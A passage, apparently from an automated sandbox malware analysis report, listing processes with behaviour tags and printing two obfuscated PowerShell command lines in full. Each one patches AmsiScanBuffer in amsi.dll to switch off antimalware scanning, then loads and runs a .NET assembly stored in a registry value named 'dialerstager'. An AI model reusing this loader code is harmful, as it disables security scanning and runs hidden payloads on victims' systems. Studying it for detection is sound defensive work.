+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+'i'+'r'+''+'t'+'u'+[Char](97)+''+[Char](108)+'',$SzyZOOuJDy,$aflNzVHGWgjtPW).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+','+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');Write-Output $NckIWEVLpjq.CreateType();}$FiQVseZHmcrEQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+'.'+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+'.'+'U'+'n'+'sa'+[Char](102)+''+[Char](101)+''+[Char](70)+''+[Char](105)+''+[Char](81)+''+[Char](86)+''+[Char](115)+''+[Char](101)+'ZHm'+[Char](99)+''+'r'+''+[Char](69)+''+[Char](81)+'');$tDKQEAecAKpDSk=$FiQVseZHmcrEQ.GetMethod('t'+[Char](68)+''+'K'+''+[Char](81)+''+[Char](69)+''+'A'+'e'+[Char](99)+''+'A'+''+[Char](75)+''+'p'+''+[Char](68)+''+'S'+''+[Char](107)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'tat'+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lXUaFQdqAAQVbGRixsq=eWeaOgdfVQBO @([String])([IntPtr]);$LHRtmVjqTPAbpFqMwmfyjB=eWeaOgdfVQBO 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jfspRDyfqCf=$FiQVseZHmcrEQ.GetMethod('G'+[Char](101)+''+[Char](116)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e'+[Char](72)+''+'a'+'n'+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+'2'+[Char](46)+'d'+[Char](108)+'l')));$SEFZsKozODJUll=$tDKQEAecAKpDSk.Invoke($Null,@([Object]$jfspRDyfqCf,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$nPGxHRUaehtPCFxHD=$tDKQEAecAKpDSk.Invoke($Null,@([Object]$jfspRDyfqCf,[Object](''+[Char](86)+''+'i'+'r'+'t'+''+'u'+''+[Char](97)+''+'l'+'Pr'+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$HintsWL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SEFZsKozODJUll,$lXUaFQdqAAQVbGRixsq).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+'l');$RKbcduaSFzIclxOFO=$tDKQEAecAKpDSk.Invoke($Null,@([Object]$HintsWL,[Object](''+'A'+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+'nB'+[Char](117)+''+[Char](102)+'f'+'e'+'r')));$WNqtTcIiAS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nPGxHRUaehtPCFxHD,$LHRtmVjqTPAbpFqMwmfyjB).Invoke($RKbcduaSFzIclxOFO,[uint32]8,4,[ref]$WNqtTcIiAS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$RKbcduaSFzIclxOFO,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nPGxHRUaehtPCFxHD,$LHRtmVjqTPAbpFqMwmfyjB).Invoke($RKbcduaSFzIclxOFO,[uint32]8,0x20,[ref]$WNqtTcIiAS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+''+[Char](87)+'A'+[Char](82)+'E').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+''+'r'+'s'+'t'+''+[Char](97)+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID: 3252
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ViwCWEanVVqb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EAAEmsKMTEgoCb,[Parameter(Position=1)][Type]$GhbKKLhkFZ)$xmRXvMlVtQr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+'l'+''+[Char](101)+''+'c'+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+'e'+'g'+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+'m'+''+'o'+''+'r'+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+'l'+'e'+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+'y'+''+[Char](112)+''+'e'+'',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+'si'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$xmRXvMlVtQr.DefineConstructor(''+'R'+''+'T'+'S'+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g,'+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$EAAEmsKMTEgoCb).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+'e,M'+[Char](97)+''+'n'+''+[Char](97)+'g'+'e'+'d');$xmRXvMlVtQr.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,H'+[Char
](105)+'d'+[Char](101)+'B'+'y'+'S'+'i'+'g'+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'o'+[Char](116)+','+[Char](86)+''+'i'+'r'+[Char](116)+'ua'+[Char](108)+'',$GhbKKLhkFZ,$EAAEmsKMTEgoCb).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'t'+'i'+''+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $xmRXvMlVtQr.CreateType();}$usxCwMzOzvloc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+'e'+[Char](109)+''+'.'+'d'+'l'+'l')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+'f'+'t'+'.'+[Char](87)+'i'+[Char](110)+'32.U'+'n'+''+[Char](115)+''+'a'+''+[Char](102)+'e'+[Char](117)+''+[Char](115)+''+'x'+'C'+[Char](119)+''+[Char](77)+''+[Char](122)+'O'+[Char](122)+''+'v'+''+[Char](108)+''+[Char](111)+'c');$BoTDRYcMewqGUm=$usxCwMzOzvloc.GetMethod(''+[Char](66)+''+[Char](111)+''+[Char](84)+'D'+'R'+''+[Char](89)+''+[Char](99)+''+[Char](77)+''+[Char](101)+'wqG'+'U'+''+'m'+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+'t'+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FhzMlEZlNqCuLjVWETS=ViwCWEanVVqb @([String])([IntPtr]);$IgqvZrhmVfCNjmiwoWexoO=ViwCWEanVVqb 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OWhIoSqESyC=$usxCwMzOzvloc.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+[Char](101)+''+'H'+''+'a'+''+'n'+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('ke'+[Char](114)+'n'+'e'+''+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$fCinQfxyStNAWR=$BoTDRYcMewqGUm.Invoke($Null,@([Object]$OWhIoSqESyC,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+'r'+''+'y'+'A')));$mKpNNihjYnyPDLdHF=$BoTDRYcMewqGUm.Invoke($Null,@([Object]$OWhIoSqESyC,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+'rote'+'c'+'t')));$apmDBEg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fCinQfxyStNAWR,$FhzMlEZlNqCuLjVWETS).Invoke('a'+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$vXfuVoDkBepvCwzQl=$BoTDRYcMewqGUm.Invoke($Null,@([Object]$apmDBEg,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+'S'+'c'+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+'f'+''+[Char](101)+''+'r'+'')));$JwNxtdLprj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mKpNNihjYnyPDLdHF,$IgqvZrhmVfCNjmiwoWexoO).Invoke($vXfuVoDkBepvCwzQl,[uint32]8,4,[ref]$JwNxtdLprj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vXfuVoDkBepvCwzQl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mKpNNihjYnyPDLdHF,$IgqvZrhmVfCNjmiwoWexoO).Invoke($vXfuVoDkBepvCwzQl,[uint32]8,0x20,[ref]$JwNxtdLprj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'FT'+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('d'+[Char](105)+'a'+[Char](108)+''+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4628
Network
MITRE ATT&CK Enterprise v6
Downloads